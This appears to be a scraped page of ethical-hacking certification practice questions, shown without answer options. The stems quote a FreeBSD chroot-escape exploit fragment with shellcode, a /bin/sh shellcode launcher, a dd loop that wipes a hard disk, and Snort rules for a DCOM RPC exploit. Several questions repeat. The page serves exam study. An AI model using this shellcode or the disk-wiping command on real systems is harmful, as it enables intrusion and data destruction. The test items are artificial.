PrepAway - Latest Free Exam Questions & Answers

Author: admin

Why do only 13 hosts send a reply while the others do not?

One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcast to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker’s source IP address.
You send a ping request to the broadcast address 192.168.5.255.
[root@ceh/root]# ping -b 192.168.5.255
WARNING: pinging broadcast address
PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data.
64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms
64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms
—


There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why?

The following exploit code is extracted from what kind of attack?

#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;

The following exploit code is extracted from what kind of attack?

What can he infer from this file?

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect’s workstation. He comes across a file that is just called “file.txt” but when he opens it, he finds the following:

#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;

What can he infer from this file?

When writing shellcodes, you must avoid ____________ because these will end the string.

When writing shellcodes, you must avoid ____________ because these will end the string.

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main()
{
int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;
}

What exactly is John trying to do?

John Beetlesman, the hacker, has successfully compromised the Linux system of Angent Telecommunications, Inc’s Webserver running Apache. He has downloaded sensitive documents and database files off the machine.

Upon performing various tasks, Beetlesman finally runs the following command on the Linux box before disconnecting.

for (( i = 0;i<11;i++ )); do
dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

What exactly is John trying to do?

From the options below, choose the exploit against which this rule applies?

Study the snort rule given:

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)

From the options below, choose the exploit against which this rule applies?

What has happened when the connection is successful even though you have FTP blocked at the external firewall?

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

What has happened?

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

Why does he not see any of the traffic produced by Firewalk?

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

